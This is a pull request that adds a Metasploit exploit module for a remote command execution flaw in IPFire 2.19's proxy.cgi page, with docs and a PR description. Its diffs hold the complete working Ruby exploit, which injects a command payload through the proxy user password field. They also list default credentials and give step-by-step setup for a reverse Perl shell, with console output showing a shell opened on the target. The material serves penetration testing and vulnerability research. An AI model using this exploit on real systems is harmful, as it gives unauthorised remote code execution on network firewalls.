### PR TITLE
ipfire proxy exec

### DIFF
--- a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md
+++ b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md
@@ -8,7 +8,7 @@
   1. Install the firewall
   2. Start msfconsole
   3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
-  4. Do: ```set password admin`` or whatever it was set to at install
+  4. Do: ```set password admin``` or whatever it was set to at install
   5. Do: ```set rhost 10.10.10.10```
   6. Do: ```set payload cmd/unix/reverse_perl```
   7. Do: ```set lhost 192.168.2.229```

--- a/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md
+++ b/documentation/modules/exploit/linux/http/ipfire_proxy_exec.md
@@ -1,0 +1,47 @@
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)
+  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+## Verification Steps
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
+  4. Do: ```set password admin`` or whatever it was set to at install
+  5. Do: ```set rhost 10.10.10.10```
+  6. Do: ```set payload cmd/unix/reverse_perl```
+  7. Do: ```set lhost 192.168.2.229```
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/ipfire_proxy_exec
+    msf exploit(ipfire_proxy_rce) > set password admin
+    password => admin
+    msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
+    rhost => 192.168.2.201
+    msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
+    payload => cmd/unix/reverse_perl
+    msf exploit(ipfire_proxy_rce) > set verbose true
+    verbose => true
+    msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
+    lhost => 192.168.2.229
+    msf exploit(ipfire_proxy_rce) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.229:4444 
+    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
+
+    id
+    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+    whoami
+    nobody
+  ```

--- a/modules/exploits/linux/http/ipfire_proxy_exec.rb
+++ b/modules/exploits/linux/http/ipfire_proxy_exec.rb
@@ -6,69 +6,71 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'IPFire proxy.cgi RCE',
-      'Description' => %q{
-        IPFire, a free linux based open source firewall distribution,
-        version < 2.19 Update Core 101 contains a remote command execution
-        vulnerability in the proxy.cgi page.
-      },
-      'Author'      =>
-        [
-          'h00die <mike@stcyrsecurity.com>', # module
-          'Yann CAM'                         # discovery
-        ],
-      'References'      =>
-        [
-          [ 'URL', 'https://www.exploit-db.com/exploits/39765/' ],
-          [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
-        ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Privileged'     => false,
-      'DefaultOptions' => { 'SSL' => true },
-      'Arch'           => [ ARCH_CMD ],
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'perl awk openssl',
-            }
-        },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
-        ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'May 04 2016',
-     ))
+    super(
+      update_info(
+        info,
+        'Name'        => 'IPFire proxy.cgi RCE',
+        'Description' => %q(
+          IPFire, a free linux based open source firewall distribution,
+          version < 2.19 Update Core 101 contains a remote command execution
+          vulnerability in the proxy.cgi page.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            'Yann CAM'                         # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EBD', '39765' ],
+            [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'May 04 2016'
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ false, 'Password to login with', '']),
         Opt::RPORT(444)
-      ], self.class)
+      ], self.class
+    )
   end
 
-  def check()
+  def check
     begin
-      res = send_request_cgi({
+      res = send_request_cgi(
         'uri'       => '/cgi-bin/pakfire.cgi',
-        'method'    => 'GET',
-        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
-      })
+        'method'    => 'GET'
+      )
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
       /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
 
       if version && update && version == "2.19" && update.to_i < 101
-        Exploit::CheckCode::Vulnerable
+        Exploit::CheckCode::Appears
       else
         Exploit::CheckCode::Safe
       end
@@ -77,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def exploit()
+  def exploit
     begin
       # To manually view the vuln page, click to proxy.cgi.  At the bottom
       # select Local, and save. Ignore the error box, at the bottom of
@@ -92,19 +94,18 @@ class MetasploitModule < Msf::Exploit::Remote
       post_data << "&ACTION=Add"
       post_data << "&NCSA_MIN_PASS_LEN=6"
 
-      res = send_request_cgi({
-        'uri'       => '/cgi-bin/proxy.cgi',
-        'method'    => 'POST',
-        'ctype'     => 'application/x-www-form-urlencoded',
-        'headers'   =>
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/proxy.cgi',
+        'method'        => 'POST',
+        'ctype'         => 'application/x-www-form-urlencoded',
+        'headers'       =>
           {
-            'Referer'   => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi"
+            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi"
           },
-        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
-        'data'      => post_data
-      })
+        'data'          => post_data
+      )
 
-      #success means we hang our session, and wont get back a response
+      # success means we hang our session, and wont get back a response
       if res
         fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
         fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200

--- a/modules/exploits/linux/http/ipfire_proxy_exec.rb
+++ b/modules/exploits/linux/http/ipfire_proxy_exec.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
       /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
-      
+
       if version && update && version == "2.19" && update.to_i < 101
         Exploit::CheckCode::Vulnerable
       else
@@ -89,9 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
       post_data << "&NCSA_PASS=#{Rex::Text.uri_encode(payload_formatted)}"
       post_data << "&NCSA_PASS_CONFIRM=#{Rex::Text.uri_encode(payload_formatted)}"
       post_data << "&SUBMIT=Create+user"
-      post_data << "&ACTION=Add"      
+      post_data << "&ACTION=Add"
       post_data << "&NCSA_MIN_PASS_LEN=6"
-      
+
       res = send_request_cgi({
         'uri'       => '/cgi-bin/proxy.cgi',
         'method'    => 'POST',
@@ -109,10 +109,9 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
         fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
       end
-  
+
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
   end
 end
-  

--- a/modules/exploits/linux/http/ipfire_proxy_exec.rb
+++ b/modules/exploits/linux/http/ipfire_proxy_exec.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References'  =>
           [
-            [ 'EBD', '39765' ],
+            [ 'EDB', '39765' ],
             [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
           ],
         'License'        => MSF_LICENSE,

--- a/modules/exploits/linux/http/ipfire_proxy_exec.rb
+++ b/modules/exploits/linux/http/ipfire_proxy_exec.rb
@@ -1,0 +1,118 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'IPFire proxy.cgi RCE',
+      'Description' => %q{
+        IPFire, a free linux based open source firewall distribution,
+        version < 2.19 Update Core 101 contains a remote command execution
+        vulnerability in the proxy.cgi page.
+      },
+      'Author'      =>
+        [
+          'h00die <mike@stcyrsecurity.com>', # module
+          'Yann CAM'                         # discovery
+        ],
+      'References'      =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/39765/' ],
+          [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true },
+      'Arch'           => [ ARCH_CMD ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'perl awk openssl',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 04 2016',
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class)
+  end
+
+  def check()
+    begin
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+      })
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+      
+      if version && update && version == "2.19" && update.to_i < 101
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit()
+    begin
+      # To manually view the vuln page, click to proxy.cgi.  At the bottom
+      # select Local, and save. Ignore the error box, at the bottom of
+      # the page click the button: User Management.
+
+      payload_formatted = "||#{payload.encoded};#"
+      post_data =  "NCSA_USERNAME=#{Rex::Text.rand_text_alpha(10)}"
+      post_data << "&NCSA_GROUP=standard"
+      post_data << "&NCSA_PASS=#{Rex::Text.uri_encode(payload_formatted)}"
+      post_data << "&NCSA_PASS_CONFIRM=#{Rex::Text.uri_encode(payload_formatted)}"
+      post_data << "&SUBMIT=Create+user"
+      post_data << "&ACTION=Add"      
+      post_data << "&NCSA_MIN_PASS_LEN=6"
+      
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/proxy.cgi',
+        'method'    => 'POST',
+        'ctype'     => 'application/x-www-form-urlencoded',
+        'headers'   =>
+          {
+            'Referer'   => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi"
+          },
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+        'data'      => post_data
+      })
+
+      #success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      end
+  
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end
+  


### PR DESCRIPTION
Adds an exploit module to take advantage of the RCE vulnerability in IPFire's web interface. This is a ruby rewrite of the module from exploit-db.

iso is avail at http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/ipfire_proxy_exec`
- [x] `set password admin``` or whatever it was set to at install
- [x] `set rhost 10.10.10.10`
- [x] `set payload cmd/unix/reverse_perl`
- [x] `set lhost 10.10.10.1`
- [x] `exploit`
- [x] **Verify** the thing does what it should

```
[*] Started reverse TCP handler on 192.168.2.229:4444 
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
```
